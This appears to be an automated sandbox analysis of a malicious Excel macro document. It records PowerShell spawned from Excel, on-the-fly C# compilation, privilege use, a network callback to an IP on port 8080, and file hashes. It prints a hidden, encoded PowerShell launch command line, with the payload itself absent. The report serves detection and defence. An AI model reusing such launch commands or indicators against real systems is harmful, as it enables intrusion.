Analysis Overview
SHA256
5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f
Threat Level: Known bad
The file 5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Office macro that triggers on suspicious action
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 21:58
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 21:58
Reported
2024-11-13 21:59
Platform
win7-20241023-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc 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
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp"
Network
| Country | Destination | Domain | Proto |
| CH | 194.182.164.149:8080 | | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline
| MD5 | cc13bf030191cde69868e4b27e748256 |
| SHA1 | 7a985d84475dabb80d02aac739d3b24124e1d20c |
| SHA256 | bb060f760a5b9ec469bb5f563ab0944aa837dae50f535a082465130d8da889ab |
| SHA512 | ff24139b79333a0ec3f99c72074c69cee411133f3964431620280a7df60a4ad7e5104cfd94a0f16c3975e1ef246a4ce9e5ae7d82cf51dcf389ae6b9b837fbd12 |
\??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp
| MD5 | dc9eb10b07859e23d805cc32941918e7 |
| SHA1 | 757fb1eb624141296c5c69383e573d6b886e5eb6 |
| SHA256 | 792dd3954357714c0f76dcfdf5a82e73e74478716d9a44ec96a9c5295447675b |
| SHA512 | 1be67799830ed882664a33741f9d6ef1f821a0169741fd97b3d22341f181de696d803a05536de8746f8c82d96d12e8931df27a7ed8f66a754be5808a7be1d7ae |
C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp
| MD5 | 96d3563fa093dde2099b93fb6f3c6053 |
| SHA1 | 0053ec01c09a73af92c1d1c03e44a3ca674cc5e4 |
| SHA256 | 6ef59f115a4c4f3c25ffe171be2b86371e6084fdee179ccd4cb1bc29caf966a4 |
| SHA512 | eb8052443bd3e88bf5758a0cddf9134568313fa6aaed150e0e26fe4bf2bf9a25d72198e353b4a6a81e7d836d9dfa41c40398b03225c11615f267acc6dcb9961a |
C:\Users\Admin\AppData\Local\Temp\ztdg0y54.dll
| MD5 | ded5c1d028402a58f25356d5965eb33e |
| SHA1 | 2cc7c6327e2f806c33e71ac97bbc47815302f105 |
| SHA256 | 252bd54f2c4f254693a739af65427f62c3f4d8b59514613c332848fb7b836ecf |
| SHA512 | 6073aa86fc95cdeeaf59ec176c1489e90716b28d5ea4a0c43ee3a752a517886774b03871ec6f02eb4de46bcc9bd3254b7794ae35e2bafb67285aec4b1736b8f2 |
C:\Users\Admin\AppData\Local\Temp\ztdg0y54.pdb
| MD5 | 8086a47d28b8c125c8392c53f127ea57 |
| SHA1 | 228a87d4f7f611ff1c147911c08b736f4ffd2490 |
| SHA256 | aca9e9e7902195692dc83d27dff689bb400e90c3ac9a1f286956bbf75b1407b6 |
| SHA512 | a3e316420fe3f743a88dc253bd11525cb00559dd025b4c0be44541e68c4ac049eb1e8c15edbe90aefc273a8db3025e83bbd54b940fee772577032322218304a5 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 21:58
Reported
2024-11-13 21:59
Platform
win10v2004-20241007-en
Max time kernel
36s
Max time network
37s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 832 wrote to memory of 5036 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 832 wrote to memory of 5036 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5036 wrote to memory of 4888 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 5036 wrote to memory of 4888 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 4888 wrote to memory of 4080 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 4888 wrote to memory of 4080 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc 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
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87ED.tmp" "c:\Users\Admin\AppData\Local\Temp\4sxb5iel\CSC6226AC086F4E495C90E0385C98AC523.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| CH | 194.182.164.149:8080 | | tcp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lu1ik0h3.sa5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\c:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.cmdline
| MD5 | abd0f1fd39b5de26bd9e8862a72323c9 |
| SHA1 | ac9c21f480c303e11d624c61c1bb43f19e4479af |
| SHA256 | bcfcf13672297034438c1ff300c742f0c2979ece919998bec71be0ce3d3b688e |
| SHA512 | 9aeaa37daee48bcc70c118e4991cb8603c7a578bf977de59dd3968235733aedf19d2cba9d7e5a5e769ab0fa9f209e2e419e2663e1eee529569def5560434c0ca |
\??\c:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\4sxb5iel\CSC6226AC086F4E495C90E0385C98AC523.TMP
| MD5 | 0fc7e3b5823de0eba90ba6f0cc7c95cd |
| SHA1 | e0862ceb51e4f7ff5c1e99095281815e4c8a7574 |
| SHA256 | ceb7cc720416a00145b1d6790ffd5962a1ff451584900e48e3d7dd97c15f32a7 |
| SHA512 | e70423ef046dc790bb219fa1e6f16cc1e7ae84c36b610a8ea85179b374abdd490b899e55839bd81b39356390ded13b755c0bfd04abeb7b8885be264598bb094c |
C:\Users\Admin\AppData\Local\Temp\RES87ED.tmp
| MD5 | 125233ee95e2b97a65590b158a469d44 |
| SHA1 | efb7a66627103b81641a8d87cade40764becc199 |
| SHA256 | e843e7eeed35241471ecd20225082cbdda00dea642e84e1f67d4a8e55869e824 |
| SHA512 | 3525e8410c5555f16a385f6c44af31cc9f9e171f42fe211c407b35bfe6f246e4a411c340d09a6a89ade696a0d226418945b570c965ced4ffd3dd83b705aacc8b |
C:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.dll
| MD5 | d44190194ef0411c6f6522635a7584de |
| SHA1 | 82bb3e7d63bffb795d555355c4df83a1332c419d |
| SHA256 | bef0e7f6af880adbe302c85fa2b5711efd1b2557630753e111dab00b3a4b7060 |
| SHA512 | 3a8caf0dca8e940894dc5e22488c1bffa94f570724397ea80c2c343f0321a507237193a51e2d83b251209de1cd117e6647bf0df53ae6d1f5a0a68ec40e5826c2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | faa26f75dcbe70cb3cb49fbed6d1d880 |
| SHA1 | 086ed1a9153fc9e721290261dd2c7c9d61003008 |
| SHA256 | 65d6187f238f62c59fd29fe1e129743f32db1b377f9add779ab1781b2e8d9c9e |
| SHA512 | 29f6bed11f20dbb1e3fa919bad240f814ee8ee66f59593ba82a3e96e4a269bbfb88f15443bfb17e1b93fd8dd0028ef5e85e8c9671b05e9af7bfb377cc7f98c4d |